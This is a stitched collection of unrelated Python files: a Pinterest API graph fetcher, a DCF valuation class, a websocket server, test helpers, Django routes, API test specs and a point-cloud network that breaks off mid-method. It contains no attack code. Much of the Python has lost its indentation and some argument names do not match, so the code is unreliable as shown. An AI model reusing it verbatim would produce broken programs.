url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
# get the graph of my boards
def fetch_pinterest_my_boards(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Cbio%2Caccount_type%2Ccounts%2Ccreated_at%2Cimage%2Cusername"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/boards/?access_token=" + self.access_token + \
"&fields=id%2Cname%2Curl%2Ccounts%2Ccreated_at%2Ccreator%2Cdescription%2Cimage%2Cprivacy"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myboard in result["data"]:
board = PinterestBoard(myboard)
graph.create_node(board)
graph.create_edge(Edge(board.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), board.get_id(), "CREATED"))
# get the graph of my pins
def fetch_pinterest_my_pins(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Cbio%2Caccount_type%2Ccounts%2Ccreated_at%2Cimage%2Cusername"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/pins/?access_token=" + self.access_token + \
"&fields=id%2Clink%2Cnote%2Curl%2Cattribution%2Cboard%2Ccolor%2Coriginal_link%2Ccounts%2Ccreated_at%2Ccreator%2Cimage%2Cmedia"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for mypin in result["data"]:
pin = PinterestPin(mypin)
graph.create_node(pin)
graph.create_edge(Edge(pin.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), pin.get_id(), "CREATED"))
# get the graph of my followers
def fetch_pinterest_my_followers(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/followers/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myfollower in result["data"]:
follower = PinterestUser(myfollower)
graph.create_node(follower)
graph.create_edge(Edge(user.get_id(), follower.get_id(), "FOLLOWED_BY"))
# get the graph of my following users
def fetch_pinterest_my_following_users(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/following/users/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myfollowing in result["data"]:
following = PinterestUser(myfollowing)
graph.create_node(following)
graph.create_edge(Edge(user.get_id(), following.get_id(), "FOLLOWING"))
# get the graph of my following boards
def fetch_pinterest_my_following_boards(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/following/boards/?access_token=" + self.access_token + \
"&fields=id%2Cname%2Curl%2Ccounts%2Ccreated_at%2Ccreator%2Cdescription%2Cimage%2Cprivacy"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myfollowingboard in result["data"]:
followingboard = PinterestBoard(myfollowingboard)
graph.create_node(followingboard)
graph.create_edge(Edge(user.get_id(), followingboard.get_id(), "FOLLOWING"))
creator_username = myfollowingboard["creator"]["url"].split('/')[3]
creator_result = self.get_single_user(creator_username)
creator = PinterestUser(creator_result["data"])
graph.create_node(creator)
graph.create_edge(Edge(followingboard.get_id(), creator.get_id(), "CREATED_BY"))
graph.create_edge(Edge(creator.get_id(), followingboard.get_id(), "CREATED"))
board_url = myfollowingboard["url"].split(
'/')[3] + "/" + myfollowingboard["url"].split('/')[4]
pin_result = self.get_pins_from_board(board_url)
for pin in pin_result["data"]:
single_pin_result = self.get_single_pin(pin["id"])
single_pin = PinterestPin(single_pin_result["data"])
graph.create_node(single_pin)
graph.create_edge(Edge(followingboard.get_id(), single_pin.get_id(), "HAS"))
graph.create_edge(Edge(single_pin.get_id(), followingboard.get_id(), "ON"))
# User node of Pinterest
class PinterestUser(Node):
def __init__(self, result):
label = result["first_name"] + " " + result["last_name"]
Node.__init__(self, result["id"], label, "user")
self.username = result["username"]
self.first_name = result["first_name"]
self.last_name = result["last_name"]
self.bio = result["bio"]
self.account_type = result["account_type"]
self.url = result["url"]
self.image_url = result["image"]["60x60"]["url"]
self.created_at = result["created_at"]
self.pins_count = result["counts"]["pins"]
self.following_count = result["counts"]["following"]
self.followers_count = result["counts"]["followers"]
self.boards_count = result["counts"]["boards"]
# Board node of Pinterest
class PinterestBoard(Node):
def __init__(self, result):
Node.__init__(self, result["id"], result["name"], "board")
self.name = result["name"]
self.url = result["url"]
self.image_url = result["image"]["60x60"]["url"]
self.created_at = result["created_at"]
self.privacy = result["privacy"]
self.pins_count = result["counts"]["pins"]
self.collaborators_count = result["counts"]["collaborators"]
self.followers_count = result["counts"]["followers"]
self.description = result["description"]
# Pin node of Pinterest
class PinterestPin(Node):
def __init__(self, result):
Node.__init__(self, result["id"], "pin_" + result["id"], "pin")
self.url = result["url"]
self.image_url = result["image"]["original"]["url"]
self.link = result["link"]
self.media = result["media"]["type"]
self.original_link = result["original_link"]
self.created_at = result["created_at"]
self.note = result["note"]
self.color = result["color"]
self.saves = result["counts"]["saves"]
self.comments = result["counts"]["comments"]
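# Minimal usage sketch (hypothetical access token and username; the stub graph below only
# implements the two methods this module calls and is not the real graphipy graph object):
if __name__ == "__main__":
    class _StubGraph:
        def create_node(self, node):
            print("node:", node.get_id())
        def create_edge(self, edge):
            print("edge:", edge)
    api = {"access_token": "YOUR_ACCESS_TOKEN"}
    Pinterest(api).fetch_pinterest_user_by_username(_StubGraph(), "someusername")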
|
56960
|
import numpy as np
import pandas as pd
from autodcf.models._base import AbstractDCF
from datetime import datetime
class DCF(AbstractDCF):
"""Class for flexible DCF.
Note that all _to_sales args take either an iterable or float. If given a float, the DCF will
use this constant across all time periods (ex: if given 0.45 for COGS, COGS will be 45% of sales
for all forecasted periods). If given iterable, the first value will be the value used for the first
year in the forecast and the last value will be the value used in the terminal year.
Args:
company (autodcf.company.Company): Company to do DCF analysis for.
sales_growth (Union[Iterable, float]): Iterable of sales growth numbers to iterate over or constant growth rate.
Values are in order, so first value in iterable applies to next sales period and
last value applies to last sales period in DCF. Note, if you want to have 5% sales growth, use 0.05.
discount_rate (float): Rate at which cash flow should be discounted.
terminal_growth_rate (float): Rate at which sales are estimated to grow after returning to normal profit levels.
window (int): Number of years until company returns to normal profit margins (terminal year).
cogs_to_sales (Union[Iterable, float]): COGS as % of sales.
sga_to_sales (Union[Iterable, float]): SGA as % of sales.
rd_to_sales (Union[Iterable, float]): R&D as % of sales.
da_to_sales (Union[Iterable, float]): Depreciation & amortization as % of sales. Assumes amortization is tax
deductible.
interest_to_sales (Union[Iterable, float]): Interest as % of sales.
tax_rate (float): Tax rate.
capex_to_sales (Union[Iterable, float]): Capex as % of sales.
change_in_nwc_to_change_in_sales (float): Ratio of how much net working capital must change to increase sales by
1 unit.
"""
def __init__(self,
company,
sales_growth,
discount_rate,
terminal_growth_rate,
window,
cogs_to_sales,
sga_to_sales,
rd_to_sales,
da_to_sales,
interest_to_sales,
tax_rate,
capex_to_sales,
change_in_nwc_to_change_in_sales,
terminal_discount_rate=None):
self._company = company
self._sales_growth = sales_growth
self._discount_rate = discount_rate
self._terminal_growth_rate = terminal_growth_rate
self._window = window
self._cogs_to_sales = cogs_to_sales
self._sga_to_sales = sga_to_sales
self._rd_to_sales = rd_to_sales
self._da_to_sales = da_to_sales
self._interest_to_sales = interest_to_sales
self._tax_rate = tax_rate
self._capex_to_sales = capex_to_sales
self._change_in_nwc_to_change_in_sales = change_in_nwc_to_change_in_sales
self._forecast = pd.DataFrame(index=np.arange(-1, self.window + 1))
self._terminal_discount_rate = discount_rate if terminal_discount_rate is None else terminal_discount_rate
@property
def company(self):
"""Company object to do DCF for."""
return self._company
@property
def sales_growth(self):
"""Numpy array of sales growth for each year until end of window."""
return self._sales_growth
@property
def discount_rate(self):
"""Discount rate to discount cash flow at."""
return self._discount_rate
@property
def terminal_discount_rate(self):
"""Discount rate after terminal year."""
return self._terminal_discount_rate
@property
def terminal_growth_rate(self):
"""Rate at which sales are expected to grow perpetually."""
return self._terminal_growth_rate
@property
def window(self):
"""Periods of normal sales growth until terminal growth rate takes over."""
return self._window
@property
def cogs_to_sales(self):
"""Cost of goods sold as a percentage of sales."""
return self._cogs_to_sales
@property
def sga_to_sales(self):
"""Selling, general, and administrative costs as a percentage of sales."""
return self._sga_to_sales
@property
def rd_to_sales(self):
"""Research and development costs as a percentage of sales."""
return self._rd_to_sales
@property
def da_to_sales(self):
"""Depreciation and amortization as a percentage of sales."""
return self._da_to_sales
@property
def interest_to_sales(self):
"""Interest expense as a percentage of sales."""
return self._interest_to_sales
@property
def tax_rate(self):
"""Effective tax rate for company."""
return self._tax_rate
@property
def capex_to_sales(self):
"""Capital expenditures as a percentage of sales."""
return self._capex_to_sales
@property
def change_in_nwc_to_change_in_sales(self):
"""How much net working capital is expected to need to increase for each dollar increase in sales."""
return self._change_in_nwc_to_change_in_sales
def _calculate_sales(self):
"""Calculate sales for window of growth.
Returns:
Numpy array with sales from each period in order.
"""
sales_growth = np.repeat(self.sales_growth, self.window + 1) if isinstance(self.sales_growth,
float) else self.sales_growth
initial_sales = self.company.income_statement.sales
return np.concatenate(([initial_sales], initial_sales * np.cumprod(1 + sales_growth)))
def _multiply_by_sales_percent(self, percent_of_sales):
"""Find values for stat in all periods given percent of sales stat accounts for.
Returns:
Pandas series with statistic multiplied by forecast Sales values.
"""
return self._forecast['Sales'] * percent_of_sales
def _calculate_free_cash_flow(self):
"""Calculate free cash flow for each period.
Returns:
Pandas Series with free cash flow for each period in forecast.
"""
return self._forecast['Net Income'] + self._forecast['D&A'] - self._forecast['Capex'] - self._forecast[
'Change in NWC']
def _discount_cash_flows(self):
"""Discount cash flows at given discount rate."""
discount_factors = np.array([1 / (1 + self.discount_rate) ** i for i in range(self.window + 1)])
return self._forecast.loc[0:, 'FCF'] * discount_factors
def forecast(self):
"""Get pandas dataframe with all info needed to complete forecast.
Returns:
forecast (pd.DataFrame): Pandas data frame with forecasted future income statements and discounted
free cash flows.
"""
self._forecast['Year'] = np.arange(datetime.now().year - 1, datetime.now().year + self.window + 1)
self._forecast['Sales'] = self._calculate_sales()
self._forecast['COGS'] = self._multiply_by_sales_percent(self.cogs_to_sales)
self._forecast['Gross Profit'] = self._forecast['Sales'] - self._forecast['COGS']
self._forecast['SG&A'] = self._multiply_by_sales_percent(self.sga_to_sales)
self._forecast['Operating Profit'] = self._forecast['Gross Profit'] - self._forecast['SG&A']
self._forecast['R&D'] = self._multiply_by_sales_percent(self.rd_to_sales)
self._forecast['EBITDA'] = self._forecast['Operating Profit'] - self._forecast['R&D']
self._forecast['D&A'] = self._multiply_by_sales_percent(self.da_to_sales)
self._forecast['EBIT'] = self._forecast['EBITDA'] - self._forecast['D&A'] # noqa:E501
self._forecast['Interest'] = self._multiply_by_sales_percent(self.interest_to_sales)
self._forecast['EBT'] = self._forecast['EBIT'] - self._forecast['Interest']
self._forecast['Taxes'] = self._forecast['EBT'] * self.tax_rate
self._forecast.loc[-1, 'Taxes'] = self.company.income_statement.tax
self._forecast['Net Income'] = self._forecast['EBT'] - self._forecast['Taxes']
self._forecast['Capex'] = self._multiply_by_sales_percent(self.capex_to_sales)
# ΔSales * ΔNWC/ΔSales = ΔNWC
change_in_sales = np.diff(self._forecast['Sales'])
future_changes_nwc = change_in_sales * self.change_in_nwc_to_change_in_sales
self._forecast['Change in NWC'] = np.concatenate(([0.0], future_changes_nwc))
self._forecast['FCF'] = self._calculate_free_cash_flow()
self._forecast['Discounted FCF'] = self._discount_cash_flows()
return self._forecast
@property
def enterprise_value(self):
"""Enterprise value given by discounted cash flow analysis."""
return self.discounted_window_cash_flow + self.discounted_terminal_cash_flow
@property
def equity_value(self):
"""Returns total equity value of firm."""
return self.enterprise_value - self.company.balance_sheet.net_debt
@property
def equity_value_per_share(self):
"""Equity value divided by total number of shares outstanding."""
return self.equity_value / self.company.fully_diluted_shares
@property
def discounted_terminal_cash_flow(self):
"""Sum of discounted cash flows after window."""
f = self.forecast()
last_fcf = f.loc[self.window, 'Discounted FCF']
terminal_discount_minus_growth = (self.terminal_discount_rate - self.terminal_growth_rate)
tv_discounted_to_window = last_fcf * (1 + self.terminal_growth_rate) / terminal_discount_minus_growth
return tv_discounted_to_window / (1 + self.discount_rate) ** self.window
@property
def discounted_window_cash_flow(self):
"""Add up discounted cash flows from window."""
f = self.forecast()
return f.loc[0:, 'Discounted FCF'].sum()
@property
def absolute_upside_per_share(self):
return self.equity_value_per_share - self.company.price_per_share
@property
def percent_upside_per_share(self):
return self.absolute_upside_per_share / self.company.price_per_share
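# --- Usage sketch (editor's addition, not part of the library) ---------------
# A minimal, hedged example of driving the DCF class above. The real
# autodcf.company.Company API is not shown in this file, so the stub below only
# provides the attributes this class actually reads (income_statement.sales/.tax,
# balance_sheet.net_debt, fully_diluted_shares, price_per_share) and assumes
# AbstractDCF imposes no further abstract members. All numbers are made up.
if __name__ == '__main__':
    from types import SimpleNamespace

    stub_company = SimpleNamespace(
        income_statement=SimpleNamespace(sales=1000.0, tax=50.0),
        balance_sheet=SimpleNamespace(net_debt=200.0),
        fully_diluted_shares=100.0,
        price_per_share=9.0,
    )
    dcf = DCF(company=stub_company,
              sales_growth=0.05,  # constant 5% growth over the window
              discount_rate=0.09,
              terminal_growth_rate=0.02,
              window=5,
              cogs_to_sales=0.45,
              sga_to_sales=0.15,
              rd_to_sales=0.05,
              da_to_sales=0.04,
              interest_to_sales=0.01,
              tax_rate=0.21,
              capex_to_sales=0.05,
              change_in_nwc_to_change_in_sales=0.1)
    print(dcf.forecast()[['Year', 'Sales', 'FCF', 'Discounted FCF']])
    print('Equity value per share:', dcf.equity_value_per_share)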
|
56968
|
import asyncio
import json
import logging
from typing import List, Set
import websockets
class BrowserWebsocketServer:
"""
The BrowserWebsocketServer manages our connection to our browser extension,
brokering messages between Google Meet and our plugin's EventHandler.
We expect browser tabs (and our websockets) to come and go, and our plugin is
long-lived, so we have a lot of exception handling to do here to keep the
plugin running. Most actions are "best effort".
We also have to handle the possibility of multiple browser websockets at the
same time, e.g. in case the user refreshes their Meet window and we have stale
websockets hanging around, or if we have multiple Meet tabs.
"""
def __init__(self):
"""
Remember to call start() before attempting to use your new instance!
"""
self._logger = logging.getLogger(__name__)
"""
Store all of the connected sockets we have open to the browser extension,
so we can use them to send outbound messages from this plugin to the
extension.
"""
self._ws_clients: Set[websockets.WebSocketServerProtocol] = set()
"""
Any EventHandlers registered to receive inbound events from the browser extension.
"""
self._handlers: List["EventHandler"] = []
    def start(self, hostname: str, port: int):
return websockets.serve(self._message_receive_loop, hostname, port)
async def send_to_clients(self, message: str) -> None:
"""
Send a message from our plugin to the Chrome extension. We broadcast to
any connections we have, in case the user has multiple Meet windows/tabs
open.
"""
if self._ws_clients:
self._logger.info(
f"Broadcasting message to connected browser clients: {message}")
await asyncio.wait([client.send(message) for client in self._ws_clients])
else:
            self._logger.warning(
("There were no active browser extension clients to send our"
f" message to! Message: {message}"))
def register_event_handler(self, handler: "EventHandler") -> None:
"""
Register your EventHandler to have it receive callbacks whenever we
get an event over the wire from the browser extension.
"""
self._handlers.append(handler)
def num_connected_clients(self) -> int:
return len(self._ws_clients)
def _register_client(self, ws: websockets.WebSocketServerProtocol) -> None:
self._ws_clients.add(ws)
self._logger.info(
(f"{ws.remote_address} has connected to our browser websocket."
f" We now have {len(self._ws_clients)} active connection(s)."))
async def _unregister_client(self, ws: websockets.WebSocketServerProtocol) -> None:
try:
await ws.close()
except:
self._logger.exception(
"Exception while closing browser webocket connection.")
if ws in self._ws_clients:
self._ws_clients.remove(ws)
self._logger.info(
(f"{ws.remote_address} has disconnected from our browser websocket."
f" We now have {len(self._ws_clients)} active connection(s) remaining."))
async def _message_receive_loop(self, ws: websockets.WebSocketServerProtocol, uri: str) -> None:
"""
Loop of waiting for and processing inbound websocket messages, until the
connection dies. Each connection will create one of these coroutines.
"""
self._register_client(ws)
try:
async for message in ws:
self._logger.info(
f"Received inbound message from browser extension. Message: {message}")
await self._process_inbound_message(message)
except:
self._logger.exception(
"BrowserWebsocketServer encountered an exception while waiting for inbound messages.")
finally:
await self._unregister_client(ws)
if not self._ws_clients:
for handler in self._handlers:
try:
await handler.on_all_browsers_disconnected()
except:
self._logger.exception(
"Connection mananger received an exception from EventHandler!")
async def _process_inbound_message(self, message: str) -> None:
"""
Process one individual inbound websocket message.
"""
try:
parsed_event = json.loads(message)
except:
self._logger.exception(
f"Failed to parse browser websocket message as JSON. Message: {message}")
return
for handler in self._handlers:
try:
await handler.on_browser_event(parsed_event)
except:
self._logger.exception(
"Connection mananger received an exception from EventHandler!")
|
56973
|
from tool.runners.python import SubmissionPy
class JonSubmission(SubmissionPy):
def run(self, s):
claimed = dict()
for l in s.splitlines():
a = l.split('@')[1].strip().split(':')
b = a[0].split(',')
c = a[1].split('x')
x = int(b[0])
y = int(b[1])
w = int(c[0])
h = int(c[1])
for i in range(w):
for j in range(h):
pt = (x+i, y+j)
claimed[pt] = claimed.get(pt, 0) + 1
# copy-pasta ftw
for l in s.splitlines():
a = l.split('@')[1].strip().split(':')
b = a[0].split(',')
c = a[1].split('x')
x = int(b[0])
y = int(b[1])
w = int(c[0])
h = int(c[1])
overlap = False
for i in range(w):
for j in range(h):
pt = (x+i, y+j)
if claimed[pt] > 1:
overlap = True
if not overlap:
return l.split('@')[0].strip()[1:]
return 'nope'
|
56987
|
import pandas as pd
from pandas.testing import assert_frame_equal
import pytest
def assert_dataframes_equals(expected, actual):
assert expected.shape==actual.shape
assert set(expected.columns) == set(actual.columns)
columns_order = list(expected.columns)
a = actual[columns_order].sort_values(by=list(actual.columns)).reset_index(drop=True)
e = expected[columns_order].sort_values(by=list(actual.columns)).reset_index(drop=True)
assert_frame_equal(e, a, check_dtype=False)
def get_expected_and_actual(df):
actual_query_string = df.df_sql_convert_table.get_sql_string()
actual_columns = df.df_sql_convert_table.columns
datetime_columns = [c for c in actual_columns.keys() if actual_columns[c].dtype == 'DATETIME']
df_actual = pd.read_sql_query(actual_query_string, pytest.sql_connection, parse_dates=datetime_columns)
df_expected = df.df_pandas
return df_expected, df_actual
def assert_(df):
df_expected, df_actual = get_expected_and_actual(df)
# i = df_expected.new_value != df_actual.new_value
# a=df_expected[i][:3]
# b=df_expected[i][:3]
assert_dataframes_equals(df_expected, df_actual)
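# --- Usage sketch (editor's addition) -----------------------------------------
# assert_dataframes_equals() compares two frames while ignoring row order,
# column order and dtype. A tiny self-contained example with plain DataFrames
# (the helpers above that touch pytest.sql_connection are project-specific and
# not exercised here):
if __name__ == '__main__':
    expected = pd.DataFrame({'a': [1, 2], 'b': ['x', 'y']})
    actual = pd.DataFrame({'b': ['y', 'x'], 'a': [2.0, 1.0]})  # reordered, different dtype
    assert_dataframes_equals(expected, actual)
    print('dataframes match (ignoring row order, column order and dtype)')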
|
57038
|
import click
from gradient.cli import common
from gradient.cli.clusters import clusters
from gradient.cli.common import api_key_option
from gradient.commands.machine_types import ListMachineTypesCommand
@clusters.group("machineTypes", help="Manage machine types")
def machine_types_group():
pass
@machine_types_group.command("list", help="List available machine types")
@click.option(
"--clusterId",
"cluster_id",
help="Filter machine types by cluster ID",
cls=common.GradientOption,
)
@api_key_option
@common.options_file
def list_machine_types(cluster_id=None, options_file=None, api_key=None):
command = ListMachineTypesCommand(api_key=api_key)
command.execute(cluster_id=cluster_id)
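# --- Editor's note (assumed usage) --------------------------------------------
# Based on the group/command/option names registered above, the corresponding
# CLI invocation would look roughly like:
#   gradient clusters machineTypes list --clusterId <cluster-id>
# The exact root command and API-key flag depend on how the `clusters` group and
# api_key_option are mounted elsewhere in gradient.cli.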
|
57100
|
expected_output = {
"interfaces": {
"Port-channel1": {
"name": "Port-channel1",
"protocol": "lacp",
"members": {
"GigabitEthernet0/0/1": {
"activity": "Active",
"age": 18,
"aggregatable": True,
"collecting": True,
"defaulted": False,
"distributing": True,
"expired": False,
"flags": "FA",
"interface": "GigabitEthernet0/0/1",
"lacp_port_priority": 100,
"oper_key": 1,
"port_num": 2,
"port_state": 63,
"synchronization": True,
"system_id": "00127,6487.88ff.68ef",
"timeout": "Short",
},
"GigabitEthernet0/0/7": {
"activity": "Active",
"age": 0,
"aggregatable": True,
"collecting": False,
"defaulted": False,
"distributing": False,
"expired": False,
"flags": "FA",
"interface": "GigabitEthernet0/0/7",
"lacp_port_priority": 200,
"oper_key": 1,
"port_num": 1,
"port_state": 15,
"synchronization": True,
"system_id": "00127,6487.88ff.68ef",
"timeout": "Short",
},
},
}
}
}
|
57133
|
from django.urls import path
from . import views
app_name = 'core'
urlpatterns = [
path('', views.blog, name='blog'),
path('<int:pk>/', views.post_detail, name='post_detail'),
path('<int:pk>/share/', views.post_share, name='post_share'),
path('manage/', views.ManagePostListView.as_view(), name='manage'),
path('create/', views.PostCreateView.as_view(), name='create'),
path('<pk>/edit/', views.PostUpdateView.as_view(), name='post_edit'),
path('<pk>/delete/', views.PostDeleteView.as_view(), name='post_delete'),
]
|
57181
|
from ..model_tests_utils import (
status_codes,
DELETE,
PUT,
POST,
GET,
ERROR,
random_model_dict,
check_status_code,
compare_data
)
from core.models import (
ActionSequenceType,
ExperimentTemplate,
ActionSequence
)
actionsequence_test_data = {}
actionsequence_tests = [
##----TEST 0----##
    #creates two actionsequences and two actionsequencetypes
    #creates another actionsequence with one of each as foreign keys
    #gets that actionsequence
    #puts the actionsequence, swapping in the other actionsequence/actionsequencetype
    #gets the updated actionsequence
    #deletes the updated actionsequence
    #gets the actionsequence (should return error)
[
*[{
'name': name,
'method': POST,
'endpoint': 'actionsequence-list',
'body': random_model_dict(ActionSequence),
'args': [],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': POST
}
}
} for name in ['actionsequence0', 'actionsequence1']],
*[{
'name': name,
'method': POST,
'endpoint': 'actionsequencetype-list',
'body': random_model_dict(ActionSequenceType),
'args': [],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': POST
}
}
} for name in ['actionsequencetype0', 'actionsequencetype1']],
{
'name': 'actionsequence0',
'method': POST,
'endpoint': 'actionsequence-list',
'body': (request_body := random_model_dict(ActionSequence, parent='actionsequence0__url', action_sequence_type='actionsequencetype0__url')),
'args': [],
'query_params': [],
'is_valid_response': {
'function': compare_data,
'args': [],
'kwargs': {
'status_code': POST,
'request_body': request_body
}
}
},
{
'name': 'actionsequence0_get_0',
'method': GET,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': GET
}
}
},
{
'name': 'actionsequence0_update_0',
'method': PUT,
'endpoint': 'actionsequence-detail',
'body': (request_body := random_model_dict(ActionSequence, parent='actionsequence1__url', action_sequence_type='actionsequencetype1__url')),
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': compare_data,
'args': [],
'kwargs': {
'status_code': PUT,
'request_body': request_body
}
}
},
{
'name': 'actionsequence0_get_1',
'method': GET,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': GET
}
}
},
{
'name': 'actionsequence0_delete_0',
'method': DELETE,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': DELETE
}
}
},
{
'name': 'actionsequence0_get_2',
'method': GET,
'endpoint': 'actionsequence-detail',
'body': {},
'args': [
'actionsequence0__uuid'
],
'query_params': [],
'is_valid_response': {
'function': check_status_code,
'args': [],
'kwargs': {
'status_code': ERROR
}
}
},
],
]
|
57270
|
import torch
import torch.nn as nn
from lightconvpoint.nn.deprecated.module import Module as LCPModule
from lightconvpoint.nn.deprecated.convolutions import FKAConv
from lightconvpoint.nn.deprecated.pooling import max_pool
from lightconvpoint.spatial.deprecated import sampling_quantized, knn, upsample_nearest
from lightconvpoint.utils.functional import batch_gather
class ResidualBlock(LCPModule):
def __init__(self, in_channels, out_channels, kernel_size, conv_layer, sampling, spatial_search, ratio, neighborhood_size):
super().__init__()
self.cv0 = nn.Conv1d(in_channels, in_channels//2, 1)
self.bn0 = nn.BatchNorm1d(in_channels//2)
self.cv1 = conv_layer(in_channels//2, in_channels//2, kernel_size, bias=False, sampling=sampling,
spatial_search=spatial_search, ratio=ratio, neighborhood_size=neighborhood_size)
self.bn1 = nn.BatchNorm1d(in_channels//2)
self.cv2 = nn.Conv1d(in_channels//2, out_channels, 1)
self.bn2 = nn.BatchNorm1d(out_channels)
self.activation = nn.ReLU()
self.shortcut = nn.Conv1d(in_channels, out_channels, 1) if in_channels != out_channels else nn.Identity()
self.ratio = ratio
def forward_without_features(self, pos, support_points=None, indices=None):
return self.cv1(None, pos)
def forward_with_features(self, x, pos, support_points, indices):
x_short = x
x = self.activation(self.bn0(self.cv0(x)))
x = self.activation(self.bn1(self.cv1(x, pos, support_points, indices)))
x = self.bn2(self.cv2(x))
if x_short.shape[2] != x.shape[2]:
x_short = max_pool(x_short, indices)
x_short = self.shortcut(x_short)
return self.activation(x + x_short)
class FKAConvNetwork(LCPModule):
    def __init__(self, in_channels, out_channels, segmentation=False, hidden=64, conv_layer=FKAConv, sampling=sampling_quantized, neighborhood_search=knn):
super().__init__()
self.lcp_preprocess = True
self.segmentation = segmentation
self.cv0 = conv_layer(in_channels, hidden, 16, sampling=sampling,
neighborhood_search=neighborhood_search, ratio=1, neighborhood_size=16)
self.bn0 = nn.BatchNorm1d(hidden)
self.resnetb01 = ResidualBlock(hidden, hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb10 = ResidualBlock(hidden, 2*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb11 = ResidualBlock(2*hidden, 2*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb20 = ResidualBlock(2*hidden, 4*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb21 = ResidualBlock(4*hidden, 4*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb30 = ResidualBlock(4*hidden, 8*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb31 = ResidualBlock(8*hidden, 8*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
self.resnetb40 = ResidualBlock(8*hidden, 16*hidden, 16, conv_layer, sampling, neighborhood_search, 0.25, 16)
self.resnetb41 = ResidualBlock(16*hidden, 16*hidden, 16, conv_layer, sampling, neighborhood_search, 1, 16)
if self.segmentation:
self.cv5 = nn.Conv1d(32*hidden, 16 * hidden, 1)
self.bn5 = nn.BatchNorm1d(16*hidden)
self.cv3d = nn.Conv1d(24*hidden, 8 * hidden, 1)
self.bn3d = nn.BatchNorm1d(8 * hidden)
self.cv2d = nn.Conv1d(12 * hidden, 4 * hidden, 1)
self.bn2d = nn.BatchNorm1d(4 * hidden)
self.cv1d = nn.Conv1d(6 * hidden, 2 * hidden, 1)
self.bn1d = nn.BatchNorm1d(2 * hidden)
self.cv0d = nn.Conv1d(3 * hidden, hidden, 1)
self.bn0d = nn.BatchNorm1d(hidden)
self.fcout = nn.Conv1d(hidden, out_channels, 1)
else:
self.fcout = nn.Linear(1024, out_channels)
self.dropout = nn.Dropout(0.5)
self.activation = nn.ReLU()
def forward_without_features(self, pos, support_points=None, indices=None):
_, _, ids_conv0 = self.cv0(None, pos)
_, support1, ids10 = self.resnetb10(None, pos)
_, _, ids11 = self.resnetb11(None, support1[0])
_, support2, ids20 = self.resnetb20(None, support1[0])
_, _, ids21 = self.resnetb21(None, support2[0])
_, support3, ids30 = self.resnetb30(None, support2[0])
_, _, ids31 = self.resnetb31(None, support3[0])
_, support4, ids40 = self.resnetb40(None, support3[0])
_, _, ids41 = self.resnetb41(None, support4[0])
support_points = support1 + support2 + support3 + support4
